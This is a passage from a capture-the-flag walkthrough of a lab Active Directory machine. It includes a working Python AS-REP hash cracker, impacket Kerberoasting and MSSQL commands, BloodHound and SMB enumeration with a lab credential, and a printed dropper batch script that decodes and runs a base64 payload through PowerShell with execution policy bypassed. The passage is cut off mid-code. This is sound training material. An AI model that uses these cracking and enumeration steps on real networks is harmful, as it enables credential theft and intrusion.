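    return hmac.compare_digest(hmac_md5(k1, body), checksum)


def parse_asrep_hash(line: str) -> dict:
    """Split '$krb5asrep$<etype>$<user>@<REALM>:<checksum hex>$<edata hex>' into fields."""
    _, tag, etype, principal_and_sum, edata_hex = line.strip().split("$")
    if tag != "krb5asrep":
        raise ValueError("not a krb5asrep line")
    principal, checksum_hex = principal_and_sum.split(":", 1)
    return {"etype": int(etype), "principal": principal,
            "checksum": bytes.fromhex(checksum_hex), "edata": bytes.fromhex(edata_hex)}


def crack_asrep(line: str, wordlist):
    """Return the first candidate whose NT hash validates the AS-REP, or None."""
    h = parse_asrep_hash(line)
    if h["etype"] != 23:
        raise ValueError("only RC4-HMAC (etype 23) is handled here")
    for cand in wordlist:
        cand = cand.rstrip("\r\n")  # so an open wordlist file can be passed directly
        if rc4hmac_verify(nt_hash(cand), AS_REP_USAGE, h["checksum"], h["edata"]):
            return cand
    return None


def make_demo_hash(password: str, principal: str = "kaorz@LICORDEBELLOTA.HTB") -> str:
    """Construct a hash line for testing; the plaintext is a stand-in, not a real EncASRepPart."""
    plaintext = b"constructed stand-in for the ASN.1 EncASRepPart"
    confounder = bytes(range(8))  # fixed for reproducibility; a KDC uses 8 random bytes
    checksum, edata = rc4hmac_encrypt(nt_hash(password), AS_REP_USAGE, plaintext, confounder)
    return f"$krb5asrep$23${principal}:{checksum.hex()}${edata.hex()}"


if __name__ == "__main__":
    demo = make_demo_hash("Autumn2020")
    print("cracked:", crack_asrep(demo, ["123456", "password", "Autumn2020"]))
```

The cost per candidate is one MD4, three HMAC-MD5s and an RC4 pass, which is why rockyou.txt falls in seconds above. Accounts whose AS-REP comes back with etype 17 or 18 (AES) cost a PBKDF2-HMAC-SHA1 derivation with 4096 iterations per candidate instead and need a different cracking mode, so a domain that has disabled RC4 for Kerberos raises the price of this attack by orders of magnitude even where pre-auth stays off.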

Attempt Kerberoasting

Kerberoasting is likewise a domain attack. It targets accounts with a servicePrincipalName (SPN), typically service accounts for databases, web applications and the like. Any valid domain credential is enough; it does not need to be privileged. The attacker asks the KDC for a service ticket (TGS) for the SPN; that ticket is encrypted with a key derived from the service account's password, so it can be captured, taken offline and cracked to recover the plaintext. Like AS-REP roasting it abuses a design property of Kerberos rather than a vulnerability, but it requires a working credential, whereas AS-REP roasting needs only a username.

As before, an impacket script does the work:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]                                                                                                                                                   
└─# locate -i spns                                                                                                                                                                               
/pentest/impacket/build/scripts-3.11/GetUserSPNs.py                                                                                                                                              
/pentest/impacket/examples/GetUserSPNs.py                                                                                                                                                        
/usr/local/bin/GetUserSPNs.py                                                                                                                                                                    
/usr/local/bin/__pycache__/GetUserSPNs.cpython-311.pyc                                                                                                                                           
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/GetUserSPNs.py                                                                  
/usr/share/doc/metasploit-framework/modules/auxiliary/gather/get_user_spns.md                                                                                                                    
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py                                                                                                                                          
/usr/share/metasploit-framework/modules/auxiliary/gather/get_user_spns.py                                                                                                                        
                                                                                                                                                                                                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]                                                                                                                                                   
└─# ln -s /usr/share/doc/python3-impacket/examples/GetUserSPNs.py /usr/bin/GetUserSPNs.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# GetUserSPNs.py -h                                      
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

usage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-stealth] [-usersfile USERSFILE] [-request] [-request-user username] [-save] [-outputfile OUTPUTFILE] [-ts] [-debug]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-dc-host hostname]
                      target

Queries target domain for SPNs that are running under a user account

positional arguments:
  target                domain[/username[:password]]

options:
  -h, --help            show this help message and exit
  -target-domain TARGET_DOMAIN
                        Domain to query/request if different than the domain of the user. Allows for Kerberoasting across trusts.
  -stealth              Removes the (servicePrincipalName=*) filter from the LDAP query for added stealth. May cause huge memory consumption / errors on large domains.
  -usersfile USERSFILE  File with user per line to test
  -request              Requests TGS for users and output them in JtR/hashcat format (default False)
  -request-user username
                        Requests TGS for the SPN associated to the user specified (just the username, no domain needed)
  -save                 Saves TGS requested to disk. Format is <username>.ccache. Auto selects -request
  -outputfile OUTPUTFILE
                        Output filename to write ciphers in JtR/hashcat format
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.
  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used

Run the attack:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# GetUserSPNs.py -dc-ip $ip1 LicorDebellota.htb/kaorz:Roper4155
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

No entries found!

"No entries found!" means the LDAP query for enabled user accounts with an SPN returned nothing: there is nothing to Kerberoast in this domain (at least nothing visible to kaorz). GetUserSPNs.py searches the whole domain, so this says more than that kaorz has no SPN.

Try the credential against MSSQL

Looking at the scan again, MSSQL on 1433 is the other service that accepts credentials; impacket's mssqlclient.py handles it. Note that without -windows-auth the script attempts a SQL Server login with the name given; for a domain account, add -windows-auth so it authenticates with NTLM instead.

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]                                                                                                                                                   
└─# locate -i mssqlcli                                                                                                                                                                           
/pentest/impacket/build/scripts-3.11/mssqlclient.py                                                                                                                                              
/pentest/impacket/examples/mssqlclient.py                                                                                                                                                        
/usr/local/bin/__pycache__/mssqlclient.cpython-311.pyc                                                                                                                                           
/usr/local/bin/mssqlclient.py                                                                                                                                                                    
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/mssqlclient.py                                                                  
/usr/share/doc/python3-impacket/examples/mssqlclient.py                                                                                                                                          
                                                                                                                                                                                                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]                                                                                                                                                   
└─# ln -s /usr/share/doc/python3-impacket/examples/mssqlclient.py /usr/bin/mssqlclient.py                                                                                                        
                                                
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]                                                  
└─# mssqlclient.py -h                                                                           
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
                                                                                                
usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-show] [-file FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target
                                                                                                
TDS client implementation (SSL supported).                                                      
                                                                                                                                                                                                 
positional arguments:                                                                           
  target                [[domain/]username[:password]@]<targetName or address>                  
                                                                                                                                                                                                 
options:                                                                                        
  -h, --help            show this help message and exit              
  -port PORT            target MSSQL port (default 1433)
  -db DB                MSSQL database instance (default None)
  -windows-auth         whether or not to use Windows Authentication (default False)
  -debug                Turn DEBUG output ON                                                    
  -show                 show the queries                                                        
  -file FILE            input file with commands to execute in the SQL shell
                                                                                                
authentication:                                                                                 
  -hashes LMHASH:NTHASH                         
                        NTLM hashes, format is LMHASH:NTHASH                                    
  -no-pass              don't ask for password (useful for -k)                                  
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# mssqlclient.py LicorDebellota.htb/kaorz:Roper4155@$ip1
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS

The connection fails, which means this user has no permission to connect to the database.

Looking for more potential attack paths

Now that we have tried every known port without success, we can use BloodHound to look for more potential attack paths worth trying.

BloodHound uses leaked credentials and relationship data from the domain environment to build a graph of the domain, showing the permission relationships and attack paths within it. By collecting information, identifying domain users, groups, computers and the relationships between them, and evaluating domain policies and permissions, it helps security teams identify potential attack paths and security weaknesses.

Since we already hold a credential, besides the tool's main program we also need to install the matching domain data collector (ingestor), a Python script built on the Impacket framework:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# apt search bloodhound 
Sorting... Done
Full Text Search... Done
bloodhound/kali-rolling,now 4.3.1-0kali2 amd64 [installed]
  Six Degrees of Domain Admin

bloodhound-dbgsym/kali-rolling 4.3.1-0kali2 amd64
  debug symbols for bloodhound

bloodhound.py/kali-rolling,kali-rolling 1.7.2-0kali1 all
  ingestor for BloodHound, based on Impacket (Python 3)

ruby-rails-assets-corejs-typeahead/kali-rolling,kali-rolling 1.2.1-3 all
  Fast and fully-featured autocomplete search library
                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# apt-get install bloodhound.py

Before starting the tool, initialize its database first from a separate terminal window:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# neo4j restart
Neo4j is not running.
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:30626). It is available at http://localhost:7474
There may be a short delay until the server is ready.

Initialization succeeded and the web interface is now reachable; the default username and password are both neo4j, and after logging in we are prompted to change the password.
Make sure the following ports are available:
2024-01-28-09-50-06
Finally, go back to the main window and run the command bloodhound.
It is empty at first, which is normal because no data has been imported yet. Exit for now and run the BloodHound ingestor with the credential we obtained to collect more domain information:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# bloodhound-python -c ALL -u kaorz -p Roper4155 -d LicorDebellota.htb -dc LicorDebellota.htb -ns 10.129.228.115 --zip
INFO: Found AD domain: licordebellota.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: LicorDebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: LicorDebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 28 users
INFO: Found 58 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: PivotAPI.LicorDeBellota.htb
INFO: Done in 00M 58S
INFO: Compressing output into 20240128095527_bloodhound.zip

A lot of information was collected, which confirms the user credential is valid, and the results were packed into a .zip file.
The archive does not need to be extracted before importing, but if we want to preview the files inside first we can run:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# unzip -l 20240128095527_bloodhound.zip 
Archive:  20240128095527_bloodhound.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     5988  2024-01-28 09:55   20240128095527_gpos.json
    69252  2024-01-28 09:55   20240128095527_users.json
    27439  2024-01-28 09:55   20240128095527_containers.json
    94348  2024-01-28 09:55   20240128095527_groups.json
     3164  2024-01-28 09:55   20240128095527_domains.json
     4465  2024-01-28 09:56   20240128095527_computers.json
     1672  2024-01-28 09:55   20240128095527_ous.json
---------                     -------
   206328                     7 files

Now it can be imported into the main program for analysis: click Upload Data in the top-right corner:
2024-02-06-16-30-29
Refresh the database and the analyzed information appears; then search for the user we obtained and mark it as owned:
2024-02-06-16-45-37
2024-02-06-16-46-25

Once selected, the user gets a skull icon. Clicking the user to view its node info shows that it controls no targets at all:
2024-02-06-16-47-21
2024-02-06-16-49-23
Choosing Analysis and then Shortest Paths from Owned Principals also returns no results, and the other views show nothing exploitable either.

Re-enumerating SMB shares

Earlier we tried to list SMB shares as the anonymous user without success, but now that we have a user credential we can try again:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbmap -H $ip1 -u kaorz -p Roper4155

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.129.228.115:445      Name: PivotAPI.LicorDeBellota.htb       Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Admin remota
        C$                                                      NO ACCESS       Recurso predeterminado
        IPC$                                                    READ ONLY       IPC remota
        NETLOGON                                                READ ONLY       Recurso compartido del servidor de inicio de sesión 
        SYSVOL                                                  READ ONLY       Recurso compartido del servidor de inicio de sesión
# The shares are listed and some are readable; let's try to access them
# If `smbmap` does not return the shares, tools such as `crackmapexec` can be tried
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/IPC$
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> quit
                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/NETLOGON
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug  8 18:42:28 2020
  ..                                  D        0  Sat Aug  8 18:42:28 2020
  HelpDesk                            D        0  Sun Aug  9 23:40:36 2020

                5158399 blocks of size 4096. 1027960 blocks available
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
  .                                   D        0  Sun Aug  9 23:40:36 2020
  ..                                  D        0  Sun Aug  9 23:40:36 2020
  Restart-OracleService.exe           A  1854976  Fri Feb 19 18:52:01 2021
  Server MSSQL.msg                    A    24576  Sun Aug  9 19:04:14 2020
  WinRM Service.msg                   A    26112  Sun Aug  9 19:42:20 2020

                5158399 blocks of size 4096. 1027959 blocks available
smb: \HelpDesk\> prompt off
smb: \HelpDesk\> mget *
parallel_read returned NT_STATUS_IO_TIMEOUT
getting file \HelpDesk\Restart-OracleService.exe of size 1854976 as Restart-OracleService.exe getting file \HelpDesk\Server MSSQL.msg of size 24576 as Server MSSQL.msg (20.8 KiloBytes/sec) (average 20.8 KiloBytes/sec)
getting file \HelpDesk\WinRM Service.msg of size 26112 as WinRM Service.msg (25.9 KiloBytes/sec) (average 23.2 KiloBytes/sec)
smb: \HelpDesk\> quit
                        
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/SYSVOL  
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug  8 08:59:02 2020
  ..                                  D        0  Sat Aug  8 08:59:02 2020
  LicorDeBellota.htb                 Dr        0  Sat Aug  8 08:59:02 2020

                5158399 blocks of size 4096. 1027797 blocks available
smb: \> cd LicorDeBellota.htb\
smb: \LicorDeBellota.htb\> ls
  .                                   D        0  Sat Aug  8 09:00:44 2020
  ..                                  D        0  Sat Aug  8 09:00:44 2020
  DfsrPrivate                      DHSr        0  Sat Aug  8 09:00:44 2020
  Policies                            D        0  Sat Aug  8 21:45:40 2020
  scripts                             D        0  Sat Aug  8 18:42:28 2020

                5158399 blocks of size 4096. 1027797 blocks available

Then walk through each directory in turn and download the files that look most likely to be valuable; in the end only the three files in NETLOGON were downloaded:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
 20240128095527_bloodhound.zip   ftp   Kaorz_hash   nmapscan   pdf_authors   pivotapi.pdf   Restart-OracleService.exe  'Server MSSQL.msg'   users_list  'WinRM Service.msg'
# If downloading the binary fails, the following alternative can be used:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbget -U kaorz%Roper4155 smb://10.129.228.115/NETLOGON/HelpDesk/Restart-OracleService.exe
Using domain: WORKGROUP, user: kaorz
[Restart-OracleService.exe] 62.50kB of 1.77MB (3.45%) at 2.98kB/s ETA: 00:09:47
[Restart-OracleService.exe] 562.50kB of 1.77MB (31.05%) at 9.53kB/s ETA: 00:02:115
smb://10.129.228.115/NETLOGON/HelpDesk/Restart-OracleService.exe                                                                                                               
Downloaded 1.77MB in 171 seconds
          
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls -liah
total 17M
4750478 drwxr-xr-x 4 root     root     4.0K Jan 28 23:10  .
4729383 drwxr-xr-x 3 root     root     4.0K Jan 28 09:59  ..
4763356 -rw-r--r-- 1 root     root     203K Jan 28 09:56  20240128095527_bloodhound.zip
5012685 drwxr-xr-x 3 root     root     4.0K Jan 15 16:51  ftp
4763218 -rw-r--r-- 1 root     root      567 Jan 27 23:31  Kaorz_hash
4870101 drwxr-xr-x 2 root     root     4.0K Jan 15 15:36  nmapscan
4729293 -rw-r--r-- 1 root     root       35 Jan 27 16:13  pdf_authors
4652927 -rw-r--r-- 1 cvestone cvestone  14M Jan 14 22:32  pivotapi.pdf
4751922 -rwxr-xr-x 1 root     root     1.8M Jan 28 23:13  Restart-OracleService.exe
4763357 -rw-r--r-- 1 root     root      59K Jan 28 10:37 'Server MSSQL.eml'
4763351 -rw-r--r-- 1 root     root      24K Jan 28 10:29 'Server MSSQL.msg'
4728636 -rw-r--r-- 1 root     root       79 Jan 27 22:20  users_list
4763358 -rw-r--r-- 1 root     root      64K Jan 28 10:37 'WinRM Service.eml'
4763355 -rw-r--r-- 1 root     root      26K Jan 28 10:29 'WinRM Service.msg'
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file *.msg                                                              
Server MSSQL.msg:  CDFV2 Microsoft Outlook Message                                                                                   
WinRM Service.msg: CDFV2 Microsoft Outlook Message
# A web search for how to view an Outlook Message shows that the following tool can convert the format
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# msgconvert *.msg

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
 20240128095527_bloodhound.zip   Kaorz_hash   pdf_authors    Restart-OracleService.exe  'Server MSSQL.msg'  'WinRM Service.eml'
 ftp                             nmapscan     pivotapi.pdf  'Server MSSQL.eml'           users_list         'WinRM Service.msg'
# Converted to `.eml` format, which can be opened with mousepad, bundled with Kali
Analyzing the emails

When you get hold of an email file, the first thing to do is identify the sender and recipient accounts.
Server MSSQL.eml

Date: Sun, 09 Aug 2020 11:04:14 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=17064094600.F3AEBbC1.58748
Content-Transfer-Encoding: 7bit
Subject: Server MSSQL
To: cybervaca@licordebellota.htb <cybervaca@licordebellota.htb>


--17064094600.F3AEBbC1.58748
Content-Type: text/plain; charset=UTF-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit

Good afternoon,
 
Due to the problems caused by the Oracle database installed in 2010 in Windows, it has been decided to migrate to MSSQL at the beginning of 2020.
Remember that there were problems at the time of restarting the Oracle service and for this reason a program called "Reset-Service.exe" was created to log in to Oracle and restart the service.
 
Any doubt do not hesitate to contact us.
 
Greetings,
 
The HelpDesk Team

--17064094600.F3AEBbC1.58748
Content-Type: application/rtf
Content-Disposition: inline
Content-Transfer-Encoding: base64

e1xydGYxXGFuc2lcYW5zaWNwZzEyNTJcZnJvbWh0bWwxIFxmYmlkaXMgXGRlZmYwe1xmb250dGJs
Cg17XGYwXGZzd2lzc1xmY2hhcnNldDAgQXJpYWw7fQoNe1xmMVxmbW9kZXJuIENvdXJpZXIgTmV3
O30KDXtcZjJcZm5pbFxmY2hhcnNldDIgU3ltYm9sO30KDXtcZjNcZm1vZGVyblxmY2hhcnNldDAg。。。。。

The body of this email says that because of problems with the Oracle database installed in 2010, a decision was made in 2020 to migrate to MSSQL, and that the Restart-OracleService.exe we obtained can be used to log in to Oracle and restart it. This is an operations notice, and information like this is worth remembering.
Next is WinRM Service.eml:

Date: Sun, 09 Aug 2020 11:42:20 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=17064094601.94Ba595C.58748
Content-Transfer-Encoding: 7bit
Subject: WinRM Service
To: helpdesk@licordebellota.htb <helpdesk@licordebellota.htb>


--17064094601.94Ba595C.58748
Content-Type: text/plain; charset=UTF-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit

Good afternoon.
 
After the last pentest, we have decided to stop externally displaying WinRM's service. Several of our employees are the creators of Evil-WinRM so we do not want to expose this service... We have created a rule to block the exposure of the service and we have also blocked the TCP, UDP and even ICMP output (So that no shells of the type icmp are used.)
Greetings,
 
The HelpDesk Team

--17064094601.94Ba595C.58748
Content-Type: application/rtf
Content-Disposition: inline
Content-Transfer-Encoding: base64

e1xydGYxXGFuc2lcYW5zaWNwZzEyNTJcZnJvbWh0bWwxIFxmYmlkaXMgXGRlZmYwe1xmb250dGJs。。。。。

The email body says a rule was created to block exposure of the WinRM service, and that TCP, UDP and even ICMP egress were blocked, so no ICMP-type shell can be used. This is also important information to keep in mind.

Analyzing the program (1)

Check the exact type of the executable:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file Restart-OracleService.exe 
Restart-OracleService.exe: PE32+ executable (console) x86-64, for MS Windows, 6 sections

It is a 64-bit Windows PE executable. We can also look at the readable strings in the program; these are the basic, necessary steps when reversing a binary.

# Count the lines and write them to a separate file
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings Restart-OracleService.exe | wc -l                     
23671
          
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings Restart-OracleService.exe | tee strings_Restart-Oracle

Skim through the file for sensitive data or key logic strings that might be valuable; in the end we find:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat strings_Restart-Oracle| grep inf 
 inflate 1.2.11 Copyright 1995-2017 Mark Adler 

We can ask ChatGPT what this means; although ChatGPT is sometimes unreliable, it is usable for initial triage, though a Google search is usually more trustworthy. It turns out this is the copyright notice of a software library, and inflate refers to data decompression. This information does not give us any exploitation ideas yet.
Let's also look at the dynamic libraries:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ldd Restart-OracleService.exe 
        不是动态可执行文件

After this preliminary static analysis, IDA or Ghidra can be used for deeper analysis. Even after decompilation the code is hard to read, no clear program logic emerges, and many functions look meaningless, which suggests the program is encrypted or obfuscated. Since static analysis is difficult, we can try dynamic analysis.

Monitoring processes and the registry:

For initial analysis the Microsoft Sysinternals suite is usually used; download it from: https://learn.microsoft.com/zh-cn/sysinternals/downloads
First use Procmon to capture the process, registry and other activity while the program runs:
2024-02-06-17-41-59
Set up a filter first to avoid too much noise:
2024-02-06-17-46-01
Then start capturing, run the program, clear the capture, and repeat this at least three times, checking whether the event count shown in the bottom-left corner is roughly the same each time, to make sure the program really ran to completion.
While observing, a sequence like the following appears many times in the program's behavior:
2024-02-06-17-54-34
This is obviously more interesting than the registry reads, system configuration lookups and so on, because a batch script is created to run some commands and is then destroyed afterwards, which looks even more suspicious. Moreover, the batch file name differs on each run, so it is probably generated randomly.
We can filter further and focus only on this batch script:
2024-02-06-18-00-15
Again, clear and repeat the step, comparing whether the behavior is the same as or similar to the previous run, to be sure we captured the complete behavior:
2024-02-06-18-05-33

Preserving the file: changing directory permissions

We want to know exactly what the batch script does, but the program deletes it on every run. We can prevent the deletion by changing the permissions on the Temp directory:
Disable inheritance
2024-02-06-18-10-03
Then edit the current user's permissions as shown below:
2024-02-06-18-11-28

Preserving the file: modifying the script's logic

First, analyze the captured .bat script:

@shift /0
@echo off

if %username% == cybervaca goto correcto
if %username% == frankytech goto correcto
if %username% == ev4si0n goto correcto
goto error

:correcto
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > c:\programdata\oracle.txt
echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g >> c:\programdata\oracle.txt
。。。
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> c:\programdata\oracle.txt

echo $salida = $null; $fichero = (Get-Content C:\ProgramData\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("c:\programdata\restart-service.exe", [System.Convert]::FromBase64String($salida)) > c:\programdata\monta.ps1
powershell.exe -exec bypass -file c:\programdata\monta.ps1
del c:\programdata\monta.ps1
del c:\programdata\oracle.txt
c:\programdata\restart-service.exe
del c:\programdata\restart-service.exe

:error

It branches on the current user name. If the user is cybervaca, frankytech or ev4si0n it jumps to the label :correcto, otherwise to :error. Under :correcto the script writes a series of base64-looking text lines into c:\programdata\oracle.txt, then, after some text processing, turns that .txt into a new program at c:\programdata\restart-service.exe, runs it, and finally deletes it. Here we can slightly modify the batch script's logic so that it keeps the new program, which makes it easier for us to analyze:

@shift /0
@echo off

goto correcto
goto error

:correcto
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > c:\programdata\oracle.txt
echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g >> c:\programdata\oracle.txt
。。。
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> c:\programdata\oracle.txt

echo $salida = $null; $fichero = (Get-Content C:\ProgramData\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("c:\programdata\restart-service.exe", [System.Convert]::FromBase64String($salida)) > c:\programdata\monta.ps1
powershell.exe -exec bypass -file c:\programdata\monta.ps1

:error
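
The same second stage can also be recovered statically, without running the modified script at all. The following is an added example (not code from the writeup or from the machine's own files): it parses the batch text, reassembles the echoed base64 exactly as the PowerShell loader does, checks that the result is a PE, and hashes it for triage. The batch text and the embedded "PE" are constructed stand-ins, and the function names are this example's own.

```python
"""Offline recovery of the dropper's second stage from the batch text."""
import base64
import hashlib
import re

# Constructed stand-in for the dropped executable: a 64-byte DOS header whose
# e_lfanew field (offset 0x3C) points at a "PE\0\0" signature at offset 0x40.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 56 + (0x40).to_bytes(4, "little") + b"PE\x00\x00"

USER_GATE = re.compile(r"^if %username% == (\S+) goto (\S+)", re.I | re.M)
ECHO_REDIRECT = re.compile(r"^echo (.*?) (>>?) (\S+)\s*$", re.I)
WRITE_BYTES = re.compile(r'WriteAllBytes\("([^"]+)"', re.I)
DEL_CMD = re.compile(r"^del (\S+)", re.I | re.M)


def build_sample_bat(payload=FAKE_PE, width=70):
    """Constructed batch script with the same shape as the captured one:
    user gate, base64 lines echoed into oracle.txt, a PowerShell loader
    echoed into monta.ps1, then run-and-delete."""
    b64 = base64.b64encode(payload).decode()
    chunks = [b64[i:i + width] for i in range(0, len(b64), width)]
    lines = ["@shift /0", "@echo off", "",
             "if %username% == cybervaca goto correcto",
             "if %username% == frankytech goto correcto",
             "if %username% == ev4si0n goto correcto",
             "goto error", "", ":correcto"]
    for i, chunk in enumerate(chunks):
        redirect = ">" if i == 0 else ">>"
        lines.append(f"echo {chunk} {redirect} c:\\programdata\\oracle.txt")
    lines += [
        "",
        "echo $salida = $null; $fichero = (Get-Content C:\\ProgramData\\oracle.txt) ; "
        "foreach ($linea in $fichero) {$salida += $linea }; "
        '$salida = $salida.Replace(" ",""); '
        '[System.IO.File]::WriteAllBytes("c:\\programdata\\restart-service.exe", '
        "[System.Convert]::FromBase64String($salida)) > c:\\programdata\\monta.ps1",
        "powershell.exe -exec bypass -file c:\\programdata\\monta.ps1",
        "del c:\\programdata\\monta.ps1",
        "del c:\\programdata\\oracle.txt",
        "c:\\programdata\\restart-service.exe",
        "del c:\\programdata\\restart-service.exe",
        "", ":error", ""]
    return "\r\n".join(lines)


def assembled_files(batch_text):
    """Map every redirect target to the text the script echoes into it."""
    files = {}
    for line in batch_text.splitlines():
        m = ECHO_REDIRECT.match(line)
        if m:
            # cmd writes the echo argument plus the space before the redirect,
            # which is why the real loader strips spaces before decoding.
            files.setdefault(m.group(3).lower(), []).append(m.group(1) + " ")
    return files


def decode_stage(lines):
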